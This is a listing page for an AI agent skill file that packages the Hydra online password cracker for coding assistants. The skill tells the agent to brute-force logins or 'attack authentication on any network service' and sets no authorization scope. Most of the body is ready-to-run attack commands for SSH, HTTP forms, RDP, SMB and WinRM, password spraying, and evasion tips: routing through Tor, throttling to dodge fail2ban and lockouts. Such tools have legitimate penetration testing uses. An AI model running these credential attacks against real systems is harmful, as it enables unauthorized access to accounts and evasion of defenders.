aeondave/hydra
offensive-tools/cracking/hydra/SKILL.md
Online brute-force and password spraying tool supporting 50+ protocols (SSH, HTTP, FTP, SMB, RDP, WinRM, and more). Use when asked to brute-force logins, perform password spraying, test default credentials, or attack authentication on any network service.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill hydraInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 9, 2026, 4:35 AM193.3s2 files scanned
SKILL.md
- name:
- hydra
- description:
- Online brute-force and password spraying tool supporting 50+ protocols (SSH, HTTP, FTP, SMB, RDP, WinRM, and more). Use when asked to brute-force logins, perform password spraying, test default credentials, or attack authentication on any network service.
- license:
- AGPL-3.0
- compatibility:
- Linux, Windows, macOS. Install: apt install hydra (Kali pre-installed) or build from source. Windows: use Kali WSL.
- author:
- AeonDave
- version:
- 1.1
Hydra
Fast, parallelized online password cracker for 50+ protocols.
Quick Start
# SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.10
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Multiple users + passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
Core Flags
| Flag | Description |
|------|-------------|
| -l <user> | Single username |
| -L <file> | Username list |
| -p <pass> | Single password |
| -P <file> | Password list |
| -u | Loop users before passwords (default: passwords first) |
| -C <file> | Colon-delimited user:pass list |
| -t <n> | Threads per host (default 16) |
| -T <n> | Total parallel targets |
| -s <port> | Custom port |
| -S | Use SSL/TLS |
| -o <file> | Output found credentials |
| -f | Stop after first valid pair (per host) |
| -F | Stop after first valid pair (all hosts) |
| -v | Verbose |
| -V | Very verbose (show each attempt) |
| -d | Debug |
| -R | Restore previous session |
| -I | Ignore existing restore file (start fresh) |
| -e nsr | Try: n=empty pass, s=user as pass, r=reversed user |
| -w <sec> | Wait time for server response (default 32s) |
| -W <sec> | Wait between connect attempts per thread (rate throttle) |
| -x proto | SOCKS5/HTTP proxy: -x socks5://127.0.0.1:1080 |
Supported Modules (Common)
ssh, ftp, http-get, http-post-form, https-post-form, smb, rdp, winrm, imap, pop3, smtp, mysql, postgres, mssql, telnet, vnc, ldap2, redis
Common Workflows
# SSH with user list
hydra -L users.txt -P rockyou.txt ssh://10.10.10.10 -t 4
# HTTP form login
hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \
"/admin/login.php:username=^USER^&password=^PASS^:Wrong password"
# RDP brute-force
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# FTP
hydra -l ftp -P passwords.txt ftp://10.10.10.10
# SMB password spray (single password, many users)
hydra -L users.txt -p "Summer2024!" smb://10.10.10.10
# WinRM
hydra -l administrator -P passwords.txt winrm://10.10.10.10
# Rate-limited (avoid lockouts)
hydra -l admin -P passwords.txt ssh://10.10.10.10 -t 1 -W 3
Proxy / Evasion
# Route through SOCKS5 (Tor or pivoting)
hydra -l admin -P passwords.txt -x socks5://127.0.0.1:1080 ssh://10.10.10.10
# HTTP proxy
hydra -l admin -P passwords.txt -x http://127.0.0.1:8080 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid"
Tips
- Use
-e nsrfor quick wins (null, same as user, reversed) - Set
-t 1-4for protocols with lockout policies (RDP, SMB, WinRM) -W 3adds 3s between connect attempts per thread — avoids fail2ban bans-wcontrols response timeout; increase for slow targets (e.g.,-w 10)- For HTTP forms: identify
failure_messagefrom the response body - Use
-Ito ignore leftover restore files from previous interrupted runs
Resources
| File | When to load |
|------|--------------|
| references/protocols.md | Module syntax for each protocol, POST form detection, HTTPS handling |
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026